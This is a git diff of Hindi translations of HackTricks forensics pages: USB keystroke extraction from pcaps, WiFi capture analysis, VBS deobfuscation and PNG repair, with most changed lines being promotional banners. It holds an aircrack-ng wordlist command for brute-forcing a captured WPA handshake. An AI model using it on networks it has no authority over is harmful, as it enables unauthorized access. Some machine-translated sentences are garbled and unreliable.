[**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
+{% endhint %} -यदि आपके पास एक USB कनेक्शन का pcap है जिसमें कई बार अवरुद्धियाँ हैं तो शायद यह एक USB कीबोर्ड कनेक्शन हो। +यदि आपके पास एक USB कनेक्शन का pcap है जिसमें कई बार अंतर्रुप्तियाँ हैं तो शायद यह एक USB कीबोर्ड कनेक्शन हो। एक वायरशार्क फ़िल्टर जैसे यह उपयोगी हो सकता है: `usb.transfer_type == 0x01 and frame.len == 35 and !(usb.capdata == 00:00:00:00:00:00:00:00)` यह महत्वपूर्ण हो सकता है कि "02" से शुरू होने वाला डेटा शिफ्ट का उपयोग करके दबाया गया है। -आप इसे विश्लेषित करने के लिए और अधिक जानकारी पढ़ सकते हैं और कुछ स्क्रिप्ट्स भी पा सकते हैं: +आप इसे विश्लेषित करने के लिए अधिक जानकारी पढ़ सकते हैं और कुछ स्क्रिप्ट्स भी पा सकते हैं: * [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4) * [https://github.com/tanc7/HacktheBox\_Deadly\_Arthropod\_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup) + + +{% hint style="success" %} +सीखें और प्रैक्टिस करें AWS हैकिंग:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +हैकट्रिक्स का समर्थन करें + +* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में। +
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md b/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md index 341573fc9..5193751d4 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md @@ -1,19 +1,20 @@ +{% hint style="success" %} +सीखें और प्रैक्टिस करें AWS हैकिंग: [**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। -* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks) github repos में PRs सबमिट करके। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
+{% endhint %} -यदि आपके पास एक pcap है जिसमें एक कीबोर्ड के माध्यम से USB के माध्यम से संचार है जैसे निम्नलिखित: +यदि आपके पास एक pcap है जिसमें एक कीबोर्ड के माध्यम से USB के माध्यम से संचार शामिल है जैसे निम्नलिखित: ![](<../../../.gitbook/assets/image (613).png>) @@ -22,22 +23,23 @@ HackTricks का समर्थन करने के अन्य तरी tshark -r ./usb.pcap -Y 'usb.capdata && usb.data_len == 8' -T fields -e usb.capdata | sed 's/../:&/g2' > keystrokes.txt python3 usbkeyboard.py ./keystrokes.txt ``` -आप इसे विश्लेषित करने के बारे में अधिक जानकारी पढ़ सकते हैं और कुछ स्क्रिप्ट्स यहाँ पा सकते हैं: +आप इसे विश्लेषित करने के बारे में अधिक जानकारी पढ़ सकते हैं और कुछ स्क्रिप्ट्स भी यहाँ पा सकते हैं: * [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4) * [https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup) +{% hint style="success" %} +एडब्ल्यूएस हैकिंग सीखें और अभ्यास करें:[**HackTricks प्रशिक्षण एडब्ल्यूएस रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +जीसीपी हैकिंग सीखें और अभ्यास करें: [**HackTricks प्रशिक्षण जीसीपी रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-शून्य से हीरो तक AWS हैकिंग सीखें htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें। -* **हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks) github repos में **PRs** सबमिट करके। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **ट्विटर** 🐦 पर हमें **फॉलो** करें **@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **हैकिंग ट्रिक्स साझा करें, [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में पीआर जमा करके**।
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md b/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md index 1f2cf65f1..fe38f9904 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md @@ -1,49 +1,48 @@ +{% hint style="success" %} +सीखें और प्रैक्टिस करें AWS हैकिंग:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **Twitter** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके। +* [**सब्सक्रिप्शन योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
+{% endhint %} -# BSSIDs की जाँच करें +# BSSID जाँचें -जब आप वायरशार्क का उपयोग करके एक कैप्चर प्राप्त करते हैं जिसका मुख्य ट्रैफिक Wifi है, तो आप _Wireless --> WLAN Traffic_ के साथ कैप्चर के सभी SSID की जाँच शुरू कर सकते हैं: +जब आप वायरशार्क का उपयोग करके एक कैप्चर प्राप्त करते हैं जिसका मुख्य ट्रैफिक वाईफ़ाई है, तो आप _Wireless --> WLAN Traffic_ के साथ कैप्चर के सभी एसएसआईडी की जांच शुरू कर सकते हैं: ![](<../../../.gitbook/assets/image (424).png>) ![](<../../../.gitbook/assets/image (425).png>) -## ब्रूट फोर्स +## ब्रूट फ़ोर्स -उस स्क्रीन की एक कॉलम में यह दिखाता है कि **क्या कैप में कोई प्रमाणीकरण मिला है**। यदि ऐसा है तो आप `aircrack-ng` का उपयोग करके इसे Brute force करने की कोशिश कर सकते हैं: +उस स्क्रीन के एक कॉलम में एक इंजेक्शन मिला है या नहीं, यह दिखाता है कि **क्या पीकैप में कोई प्रमाणीकरण मिला है**। यदि ऐसा है तो आप `aircrack-ng` का उपयोग करके इसे ब्रूट फ़ोर्स कर सकते हैं: ```bash aircrack-ng -w pwds-file.txt -b file.pcap ``` -# उदाहरण के लिए यह PSK (पूर्व साझा कुंजी) को सुरक्षित करने वाले WPA पासफ्रेज़ को पुनः प्राप्त करेगा, जो बाद में ट्रैफिक को डिक्रिप्ट करने के लिए आवश्यक होगा। +# डेटा बीकन / साइड चैनल में -# बीकन्स / साइड चैनल में डेटा +यदि आप संदेह कर रहे हैं कि **एक वाईफ़ाई नेटवर्क के बीकन्स में डेटा लीक हो रहा है**, तो आप नेटवर्क के बीकन्स की जांच कर सकते हैं उस नेटवर्क के बीकन्स को चेक करें जैसे निम्नलिखित फ़िल्टर का उपयोग करके: `wlan contains `, या `wlan.ssid == "NAMEofNETWORK"` शंकुलित पैकेट्स के भीतर संदेहास्पद स्ट्रिंग के लिए खोजें। -यदि आप संदेह कर रहे हैं कि **एक WiFi नेटवर्क के बीकन्स में डेटा लीक हो रहा है** तो आप नेटवर्क के बीकन्स की जांच कर सकते हैं उस फ़िल्टर का उपयोग करके जैसे: `wlan contains `, या `wlan.ssid == "NAMEofNETWORK"` आप संदेशित पैकेट्स के भीतर संदेहास्पद स्ट्रिंग के लिए खोज करें। +# एक वाईफ़ाई नेटवर्क में अज्ञात MAC पते खोजें -# एक WiFi नेटवर्क में अज्ञात MAC पते खोजें - -निम्नलिखित लिंक उपयोगी होगा **एक WiFi नेटवर्क के अंदर डेटा भेजने वाली मशीनों को खोजने के लिए**: +निम्नलिखित लिंक उपयोगी होगा **एक वाईफ़ाई नेटवर्क के भीतर डेटा भेजने वाली मशीनें** खोजने के लिए: * `((wlan.ta == e8:de:27:16:70:c9) && !(wlan.fc == 0x8000)) && !(wlan.fc.type_subtype == 0x0005) && !(wlan.fc.type_subtype ==0x0004) && !(wlan.addr==ff:ff:ff:ff:ff:ff) && wlan.fc.type==2` -यदि आप **MAC पते पहले से जानते हैं तो आप उन्हें आउटपुट से हटा सकते हैं** इस जैसे चेक्स जोड़कर: `&& !(wlan.addr==5c:51:88:31:a0:3b)` +यदि आप **MAC पते पहले से जानते हैं तो आप उन्हें आउटपुट से हटा सकते हैं** इस तरह की जाँच जोड़कर: `&& !(wlan.addr==5c:51:88:31:a0:3b)` -एक बार जब आपने नेटवर्क के अंदर **अज्ञात MAC पते** को पहचान लिया है जो भेजने के लिए आप **फ़िल्टर** जैसे इस जैसे उपयोग कर सकते हैं: `wlan.addr== && (ftp || http || ssh || telnet)` इसका ट्रैफिक फ़िल्टर करने के लिए। ध्यान दें कि ftp/http/ssh/telnet फ़िल्टर उपयोगी हैं अगर आपने ट्रैफिक को डिक्रिप्ट कर लिया है। +एक बार जब आपने नेटवर्क के भीतर **अज्ञात MAC पते** को पहचान लिया है जो भेजने के लिए ट्रैफ़िक का उपयोग कर रहे हैं, तो आप इसका उपयोग कर सकते हैं **फ़िल्टर** जैसे निम्नलिखित: `wlan.addr== && (ftp || http || ssh || telnet)` इसका ध्यान दें कि ftp/http/ssh/telnet फ़िल्टर उपयोगी होते हैं अगर आपने ट्रैफ़िक को डिक्रिप्ट कर लिया है। -# ट्रैफिक को डिक्रिप्ट करें +# ट्रैफ़िक डिक्रिप्ट करें संपादित करें --> वरीयताएँ --> प्रोटोकॉल --> IEEE 802.11--> संपादित diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md index 8d30692b2..6fd532575 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md @@ -1,19 +1,20 @@ +{% hint style="success" %} +सीखें और प्रैक्टिस करें AWS हैकिंग:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +HackTricks का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप अपनी कंपनी को **HackTricks में विज्ञापित करना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें! -* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर फॉलो करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
+{% endhint %} -यहाँ आप विशेष फ़ाइल प्रकार और/या सॉफ़्टवेयर के लिए दिलचस्प ट्रिक्स पा सकते हैं: +यहाँ आप विशेष फ़ाइल-प्रकार और/या सॉफ़्टवेयर के लिए दिलचस्प ट्रिक्स पा सकते हैं: {% page-ref page=".pyc.md" %} @@ -37,16 +38,17 @@ HackTricks का समर्थन करने के अन्य तरी +{% hint style="success" %} +सीखें और प्रैक्टिस करें AWS हैकिंग:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +HackTricks का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप अपनी कंपनी को **HackTricks में विज्ञापित करना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें! -* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर फॉलो करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md index 2bb13f8c7..15efcbc6b 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md @@ -1,19 +1,20 @@ +{% hint style="success" %} +सीखें और प्रैक्टिस करें AWS हैकिंग: [**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ! +हैकट्रिक्स का समर्थन करें -दूसरे तरीके HackTricks का समर्थन करने के लिए: - -* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। -* **अपने हैकिंग ट्रिक्स साझा करें** HackTricks और HackTricks Cloud github repos में PRs सबमिट करके। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 पर **फॉलो** करें [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
+{% endhint %} -कुछ ऐसी चीजें जो एक दुष्ट VBS फ़ाइल को डीबग/डीओबफस्केट करने में उपयोगी हो सकती हैं: +कुछ चीजें जो एक दुष्ट VBS फ़ाइल को डीबग/डीओबफ़स्केट करने में उपयोगी हो सकती हैं: ## echo ```bash @@ -52,16 +53,17 @@ End With End Function ``` +{% hint style="success" %} +**AWS हैकिंग सीखें और अभ्यास करें:**[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +**GCP हैकिंग सीखें और अभ्यास करें:** [**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -दूसरे तरीके HackTricks का समर्थन करने के लिए: - -* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह **The PEASS Family** की खोज करें -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें। -* **अपने हैकिंग ट्रिक्स साझा करें** PRs को **HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में सबमिट करके। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) ज्वाइन करें या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके हैकिंग ट्रिक्स साझा करें।
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md index f652ffea3..ffc99764d 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md @@ -1,33 +1,35 @@ -
- -जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! - -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें। -* **हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके। - -
- -**PNG फ़ाइलें** **CTF challenges** में अपनी **हानि रहित संपीड़न** के लिए प्रशंसित हैं, जिससे वे छिपी हुई डेटा को एम्बेड करने के लिए आदर्श होती हैं। **Wireshark** जैसे उपकरण PNG फ़ाइलों का विश्लेषण करने की संभावना प्रदान करते हैं, जो नेटवर्क पैकेट्स के भीतर उनके डेटा का विश्लेषण करके, छिपे हुए जानकारी या असमान्यताएँ प्रकट करते हैं। - -PNG फ़ाइल की अखंडता की जाँच और क्षति को ठीक करने के लिए, **pngcheck** एक महत्वपूर्ण उपकरण है, जो PNG फ़ाइलों की मान्यता और निदान करने के लिए कमांड लाइन कार्यक्षमता प्रदान करता है ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). जब फ़ाइलें साधारण सुधारों से परे होती हैं, तो [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) जैसी ऑनलाइन सेवाएँ एक वेब-आधारित समाधान प्रदान करती हैं **क्षतिग्रस्त PNGs को मरम्मत करने** में, CTF प्रतिभागियों के लिए महत्वपूर्ण डेटा की पुनर्प्राप्ति में सहायक होती हैं। - -ये रणनीतियाँ CTFs में एक व्यापक दृष्टिकोण की महत्वता को दर्शाती हैं, जो विश्लेषणात्मक उपकरणों और मरम्मत तकनीकों का मिश्रण उपयोग करके छिपे या खोए गए डेटा का पता लगाने और पुनर्प्राप्त करने में मदद करती हैं। +{% hint style="success" %} +**AWS हैकिंग सीखें और अभ्यास करें:**[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +**GCP हैकिंग सीखें और अभ्यास करें:** [**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें। -* **हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* 💬 **डिस्कॉर्ड समूह** (https://discord.gg/hRep4RUj7f) या **टेलीग्राम समूह** (https://t.me/peass) में **शामिल हों** या हमें **ट्विटर** 🐦 पर **फॉलो** करें [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) 